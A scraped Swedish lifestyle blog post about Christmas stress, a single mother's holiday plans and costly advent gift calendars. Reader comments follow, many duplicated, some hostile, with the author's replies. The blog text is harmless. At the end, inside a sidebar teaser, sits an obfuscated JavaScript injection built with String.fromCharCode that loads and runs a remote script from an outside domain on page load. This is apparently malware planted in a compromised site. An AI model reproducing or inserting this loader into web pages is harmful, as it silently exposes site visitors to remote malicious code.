Jul stress och jul press! -Känner du igen dig?

image image

OLYMPUS DIGITAL CAMERA

 

Hej Fina! En protein-lattè i jule tider fick det blev. jag bjöd över min granne på fika. Mysigt med spontan fika =) Nu springer jag runt och grejar i lägenheten. Jag fattar inte vart alla grejer kommer ifrån?! Det sista lasset ifrån Ölans som kom upp i juli i samband med konkursen.

Det sabbade ALLT här hemma. Du vet, såna där grejer som man inte riktigt kan slänga, men ändå inte vill ha framme. Böcker, kläder, bebis kläder, Gamla fotografier, hela min soc utredning ifrån när jag var liten. m.m. SUCK! Nu börjar jag illafall få ordning. Före/efter bilder kommer sen. När min pappa var uppe och hjälpte mig för ett tag sedan så blev förutsättningarna MYCKET bättre =)

Idag är jag lite stressad över julen…. VART vi ska fira julen är oklart. Med vem/vilka är också högst oklart.. Det är ”min” jul så Lilleman och jag ska fira tillsammans.

DET är det enda viktiga och det som faktiskt är bestämt redan nu. Jag funderar på att ta in på ett hotell eller en mysig herrgård. Bara Lilleman och jag.

 Det gjorde jag m. vänner förra året. Så himla skönt att få sätta sig till dukat bord, både jullunch, julbord och kvällsmacka. Vi var i Bålstad på krägga Herrgård förra året. Jätte mysigt. Vi kan ha likadana pyjamasår (köpt i julklapp till både honö och mig) och mysa framför en öppen spis på kvällen, titta på kalle anka m vänner osv. ”Bara vara”, njuta av lugnet och spela spel och göra sånt där som man känner för… Hmm, får fundera lite. Något måste jag såklart styra upp.  

image

Försöker göra fint inför att Lilleman ska komma. Bakom mig står en tom julgran. Den ska vi klä tillsammans =)

Allt vårt julpynt som jag sparat i alla år är borta! Usch, grejer som jag själv haft med mig genom min egen barndom och uppväxt. Minne, och sånt där man förknippar med jul. Jag hade ställt in ALLT i butiken My’s Blommor. Hade inte en tanke på det i sommars när allt kaosade som mest. Kom på det nu, när det var dags att ta fram det igen….

Nu försöker jag åka runt och hitta nytt julpynt. Som får bi Ludvigs minnen och olika favorit saker. Här ser ni en suddig bild på hans kalender. Den måste också fyllas. Med 24 paket. SUCK! Vad hände med dom där vanliga kalendrarna som man öppnade en rolig lucka varje morgon? VART tog dom vägen?

Vem kom på denna iden? Inte nog med att man ska köpa julklappar, julmat, och allt annat. Nu ska man köpa 24 små paket som man ska öppna INNAN julen. Såååååååå dyrt, stressigt och onödigt! MEN jag vill ju inte vara en sämre mamma än ”alla andra” så jag slänger mig in i samma stress och ska nu innan Ludvig landar ikväll, städa, fixa och organisera upp det sista. Samt åka och handla röda julkulor till granen och dom sista 18 paketen till kalendern! hahaha! ja, jag får skylla mig själv. jag VET! 😉

-Någon som känner igen sig? 

OLYMPUS DIGITAL CAMERA

86 Komentarer

 1. Är dina julsaker borta ? Var det inte din fd man som köpte lokalerna. Kan de inte leta fram dem så du får det tillbaka då?
  För övrigt så stressar jag aldrig till julen. Trots att hela familjen kommer till oss på mat och julklappar. Tar det för vad det är. En trevlig tid att umgås och visst kan det vara lite knepigt få till julklappar till alla, men det brukar alltid fixa sig.
  Det där med adventspresenter varje dag det skippade jag så fort det gick att prata med barna. Köpte EN present varje advent i stället. Då kan man ju faktiskt köpa nåt LITE bätre än om att köpa 24 små pryttlar.
  En chokladkalender kan de öppna varje dag men annars så är det lite spännande att få ett paket till helgen.
  Testa det ett annat år.

 2. Är dina julsaker borta ? Var det inte din fd man som köpte lokalerna. Kan de inte leta fram dem så du får det tillbaka då?
  För övrigt så stressar jag aldrig till julen. Trots att hela familjen kommer till oss på mat och julklappar. Tar det för vad det är. En trevlig tid att umgås och visst kan det vara lite knepigt få till julklappar till alla, men det brukar alltid fixa sig.
  Det där med adventspresenter varje dag det skippade jag så fort det gick att prata med barna. Köpte EN present varje advent i stället. Då kan man ju faktiskt köpa nåt LITE bätre än om att köpa 24 små pryttlar.
  En chokladkalender kan de öppna varje dag men annars så är det lite spännande att få ett paket till helgen.
  Testa det ett annat år.

 3. Tycker det låter jättemysigt att fira jul bara du och Lilleman. Då har ni tid att leka med hans julklappar utan att bli störa av annat. Njut av varandras sällskap och ha inte dåligt samvete för något. Kram??

 4. Vi har ingen kalender med klappar. Funkar minst lika bra med en vanlig. Däremot brukar vi mysa lite extra på adventsdagarna med lussekatt och myspys. Känner mig inte stressad i juletid. Tycker jag fått in en bra rutin med åren. Njuuuuuter av alla tända ljus och julsaker varje kväll. Kan du inte fira jul med din pappa? Eller mamma för den delen. Det hade nog lilleman uppskattat mer än något annat. Inte så ofta man firar jul med vänner typ. Familjen i första hand tycker jag.

 5. Tycker det låter jättemysigt att fira jul bara du och Lilleman. Då har ni tid att leka med hans julklappar utan att bli störa av annat. Njut av varandras sällskap och ha inte dåligt samvete för något. Kram🎄🎅

 6. Hej My va fasiken är bloggbevakning för jäkla skitblogg!! Verkar ju inte klok. Lämnar ju ut olika människor varje dag. Får folk skriva vad som helst nu för tiden? Sen sitter läsare och skriver ut historier precis som dom vet allting. Skrämmande. Ha en fin kväll

 7. Vi har ingen kalender med klappar. Funkar minst lika bra med en vanlig. Däremot brukar vi mysa lite extra på adventsdagarna med lussekatt och myspys. Känner mig inte stressad i juletid. Tycker jag fått in en bra rutin med åren. Njuuuuuter av alla tända ljus och julsaker varje kväll. Kan du inte fira jul med din pappa? Eller mamma för den delen. Det hade nog lilleman uppskattat mer än något annat. Inte så ofta man firar jul med vänner typ. Familjen i första hand tycker jag.

 8. My, jag läser din blogg varje dag och du är en stor inspiration både i ditt driv men även gällande kost och träning❤️Dock måste jag säga att jag blev både ledsen och besviken, när du antyder att man är En sämre förälder för att man inte köper en kalender med 24 julklappar ?Jag har knappt råd med julklappar på Julafton, än mindre 24 extra julklappar?Min dotter får en billig chocklad kalender, och hon är tacksam för det.

  • men fina…. jag antyder INTE att man är en sämre förälder. jag anoder att pressen blir att man KÄNNER sig som en sämre förälder <3 Du missförstår mig! Jag vet precis vad du menar. Jag fyller min kalender med allt möjligt. Snäckor som jag plockade i Thailand i en lucka. (för längesen) Ett fotografi i en annan… osv.. Du är ingen sämre mamma för det! Verkligen inte! <3 Förlåt om du tolkade det så… Kram

 9. Hej My va fasiken är bloggbevakning för jäkla skitblogg!! Verkar ju inte klok. Lämnar ju ut olika människor varje dag. Får folk skriva vad som helst nu för tiden? Sen sitter läsare och skriver ut historier precis som dom vet allting. Skrämmande. Ha en fin kväll

 10. Mina har aldrig fått kalendrar utan tomten flyttar in den 1 december sen om man har varit snäll så ligger det nått litet i deras jackficka på morgonen när de går till skolan å du ska tro ja har snälla barn i december å snäll har man varit om man håller ordning på sitt rum å läxorna utan tjat och inga andra otyg. Ja tycker inte om att de bara ska va för att de ska utan krävs nått med så de e värt att testa

 11. Dina fd vänner menar du väl. Du måste ha ångest de luxe att inte får vara en del av och fira jul med Graafarna i år, dina sk systrar. Denna jul blir nog i ensamhetens tecken, kan vara mysigt det också, kanske ingen som vågar bjuda hem dig med tanke på vad som hänt:(( God Jul!!

 12. Snälla My,
  av respekt för både dina läsare och samarbetspartners, kan du inte köra stavningskontroll på dina inlägg?! Särskilt eftersom du sagt att du lider av dyslexi. Då är det ju ännu viktigare. Ren slöhet att inte kolla stavningen. En kontroll hade hittat både pyjamasår och honö. Sen heter det Krägga Herrgård och inget annat och det ligger i Bålsta.
  God Jul!

  • Det stressar uppenbarligen dig mer än mig själv =) När man klickar på ditt IP nr som kommer det inte bara upp en, två eller tre kommentarer. Det är många fler! Den röda tåsen genom dina kommentarer är att du aldrig någons skrivit någonting i ett vänligt syfte. Trist. Dyslexin är vad den är. Här inne så ingår den. Vilket jag också skriver om, både i presentationen och i inläggen med jämna mellanrum . Gillar du det net så behöver du ju inte vara här inne. Om jag läser dina kommentarer så handlar det alltid om någonting som jag gör fel. Långt ifrån bara mina stavfel. Så vet du vad…. Läs, eller inte läs. Helt upp till dig, det är just det som är tjusningen med sociala medier. Det är läsaren/följarens val =) God jul!

   • ”Tack, du har rätt. Jag borde bemöda mig om att köra stavningskontroll för att höja kvalitén på min blogg.” – hade varit ett bättre svar.
    Funderar du någonsin över varför du har så få som kommenterar din blogg, trots att du själv säger att den är en av Sveriges största? Kan ju vara så att så fort du får en negativ kommentar eller en kommentar som inte passar dig, så är du otrevlig mot personen som kommenterat.
    Bland mina tidigare kommentarer till dig, eftersom du lägger mer tid på IP-adresser än stavningskontroll, så finns det bland annat en från när du frågade om hårförlängning eller inte och bad om våra ärliga svar. Men negativa svar kan du tydligen inte hantera.

    • Man behöver inte tycka lika. Det är hel okay att ha olika åsikter. Men personangrepp, hot, trakasserier och förtal sorteras bort. Både av mig och redaktionen på portalen. Så nu säger jag detta igen. Vänligt men bestämt. Sunt förnuft, en hövlig ton och respekt mot mig, mina bloggläsare men också mot dig själv… That’s it! Mer avancerat än så är det inte.

    • ”Vic” , har du ont någonstans? Så mycket bitterhet och ilska som pyser ut hela tiden. Stackare! Hoppas du börjar må bättre snart.
     Kramar

  • Inte undra på att barn lär sig att mobba, när man läser vissa kommentarer här. Antar att My’s samarbetspartners vet om hennes dyslexi och dom har uppenbarligen inga förutfattade meningar om det. Härligt att få följa din vardag My, som visar att du inte är bättre än någon annan bara för att du har en blogg. Stå på dig!

    • Bry dig inte om taskiga kommentarer, My, har själv aldrig sett några stavfel i din blogg, kanske har jag själv en släng dyslexi;-) Tycker idén om en klapp om dagen är gullig, om det är tanken som räknas, man kan ju stoppa i strumpor och snäckor, behöver ju inte vara diamanter… Hoppas lilleman kommer till dig och Sture-katten (SÅ söt!) snart;-) kram från ett somrigt Barcelona

 13. My, jag läser din blogg varje dag och du är en stor inspiration både i ditt driv men även gällande kost och träning❤️Dock måste jag säga att jag blev både ledsen och besviken, när du antyder att man är En sämre förälder för att man inte köper en kalender med 24 julklappar 😔Jag har knappt råd med julklappar på Julafton, än mindre 24 extra julklappar😔Min dotter får en billig chocklad kalender, och hon är tacksam för det.

  • men fina…. jag antyder INTE att man är en sämre förälder. jag anoder att pressen blir att man KÄNNER sig som en sämre förälder <3 Du missförstår mig! Jag vet precis vad du menar. Jag fyller min kalender med allt möjligt. Snäckor som jag plockade i Thailand i en lucka. (för längesen) Ett fotografi i en annan… osv.. Du är ingen sämre mamma för det! Verkligen inte! <3 Förlåt om du tolkade det så… Kram

 14. Mina har aldrig fått kalendrar utan tomten flyttar in den 1 december sen om man har varit snäll så ligger det nått litet i deras jackficka på morgonen när de går till skolan å du ska tro ja har snälla barn i december å snäll har man varit om man håller ordning på sitt rum å läxorna utan tjat och inga andra otyg. Ja tycker inte om att de bara ska va för att de ska utan krävs nått med så de e värt att testa

 15. Dina fd vänner menar du väl. Du måste ha ångest de luxe att inte får vara en del av och fira jul med Graafarna i år, dina sk systrar. Denna jul blir nog i ensamhetens tecken, kan vara mysigt det också, kanske ingen som vågar bjuda hem dig med tanke på vad som hänt:(( God Jul!!

 16. Snälla My,
  av respekt för både dina läsare och samarbetspartners, kan du inte köra stavningskontroll på dina inlägg?! Särskilt eftersom du sagt att du lider av dyslexi. Då är det ju ännu viktigare. Ren slöhet att inte kolla stavningen. En kontroll hade hittat både pyjamasår och honö. Sen heter det Krägga Herrgård och inget annat och det ligger i Bålsta.
  God Jul!

  • Det stressar uppenbarligen dig mer än mig själv =) När man klickar på ditt IP nr som kommer det inte bara upp en, två eller tre kommentarer. Det är många fler! Den röda tåsen genom dina kommentarer är att du aldrig någons skrivit någonting i ett vänligt syfte. Trist. Dyslexin är vad den är. Här inne så ingår den. Vilket jag också skriver om, både i presentationen och i inläggen med jämna mellanrum . Gillar du det net så behöver du ju inte vara här inne. Om jag läser dina kommentarer så handlar det alltid om någonting som jag gör fel. Långt ifrån bara mina stavfel. Så vet du vad…. Läs, eller inte läs. Helt upp till dig, det är just det som är tjusningen med sociala medier. Det är läsaren/följarens val =) God jul!

   • ”Tack, du har rätt. Jag borde bemöda mig om att köra stavningskontroll för att höja kvalitén på min blogg.” – hade varit ett bättre svar.

    Funderar du någonsin över varför du har så få som kommenterar din blogg, trots att du själv säger att den är en av Sveriges största? Kan ju vara så att så fort du får en negativ kommentar eller en kommentar som inte passar dig, så är du otrevlig mot personen som kommenterat.

    Bland mina tidigare kommentarer till dig, eftersom du lägger mer tid på IP-adresser än stavningskontroll, så finns det bland annat en från när du frågade om hårförlängning eller inte och bad om våra ärliga svar. Men negativa svar kan du tydligen inte hantera.

    • Man behöver inte tycka lika. Det är hel okay att ha olika åsikter. Men personangrepp, hot, trakasserier och förtal sorteras bort. Både av mig och redaktionen på portalen. Så nu säger jag detta igen. Vänligt men bestämt. Sunt förnuft, en hövlig ton och respekt mot mig, mina bloggläsare men också mot dig själv… That’s it! Mer avancerat än så är det inte.

    • ”Vic” , har du ont någonstans? Så mycket bitterhet och ilska som pyser ut hela tiden. Stackare! Hoppas du börjar må bättre snart.
     Kramar

  • Inte undra på att barn lär sig att mobba, när man läser vissa kommentarer här. Antar att My’s samarbetspartners vet om hennes dyslexi och dom har uppenbarligen inga förutfattade meningar om det. Härligt att få följa din vardag My, som visar att du inte är bättre än någon annan bara för att du har en blogg. Stå på dig!

    • Bry dig inte om taskiga kommentarer, My, har själv aldrig sett några stavfel i din blogg, kanske har jag själv en släng dyslexi;-) Tycker idén om en klapp om dagen är gullig, om det är tanken som räknas, man kan ju stoppa i strumpor och snäckor, behöver ju inte vara diamanter… Hoppas lilleman kommer till dig och Sture-katten (SÅ söt!) snart;-) kram från ett somrigt Barcelona

 17. Julen den kommer oavsett paketkalender el en massa julklappar klara i god tid.
  Men jag själv känner mindre stress genom att planlägga tidigt & ligga steget före.Då kan man njuta av advents tiden till fullo.
  Själv tänker jag att julen är en högtid då man om möjligt ska omge sig m familj el vänner,att visa omtanke är viktigare än dyra paket under granen.
  Men har ma inte god kontakt m familj el vänner är det ju oxå fint att skapa sina helt egna traditioner!Kanske det skulle vara skönt för både dig & din son att inte resa bort utan bara vara hemma & fokusera på lugn,mys&ro?
  Önskar er en riktig fin jul m ro i själen & leende runt munnen.

 18. Julen den kommer oavsett paketkalender el en massa julklappar klara i god tid.
  Men jag själv känner mindre stress genom att planlägga tidigt & ligga steget före.Då kan man njuta av advents tiden till fullo.
  Själv tänker jag att julen är en högtid då man om möjligt ska omge sig m familj el vänner,att visa omtanke är viktigare än dyra paket under granen.
  Men har ma inte god kontakt m familj el vänner är det ju oxå fint att skapa sina helt egna traditioner!Kanske det skulle vara skönt för både dig & din son att inte resa bort utan bara vara hemma & fokusera på lugn,mys&ro?
  Önskar er en riktig fin jul m ro i själen & leende runt munnen.

 19. Jag struntar i känslan av att vara ”sämre” för att barnen inte får 48 paket redan innan julafton utan fokuserar istället på målet. ? Barnen har varsin julkalender från Ica med små rim i varje lucka och varsin chokladkalender. De frågar inte efter något annat eftersom jag aldrig nämnt att det finns alternativ. ?
  Stor Kram från Växjö!

 20. Jag struntar i känslan av att vara ”sämre” för att barnen inte får 48 paket redan innan julafton utan fokuserar istället på målet. 🙂 Barnen har varsin julkalender från Ica med små rim i varje lucka och varsin chokladkalender. De frågar inte efter något annat eftersom jag aldrig nämnt att det finns alternativ. 😉

  Stor Kram från Växjö!

 21. Mysigt att vara på hotell mycket kvalitetstid tillsammans. Ibland tycker jag att det är jobbigt med storhelger och helgdagar andra förväntar sig att man ska göra si eller så – det ena värre än det andra. Jobbigt att vara ”ensam” ibland men man kan skapa egna traditioner , hoppas det blir bra för dig My

 22. Mysigt att vara på hotell mycket kvalitetstid tillsammans. Ibland tycker jag att det är jobbigt med storhelger och helgdagar andra förväntar sig att man ska göra si eller så – det ena värre än det andra. Jobbigt att vara ”ensam” ibland men man kan skapa egna traditioner , hoppas det blir bra för dig My

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/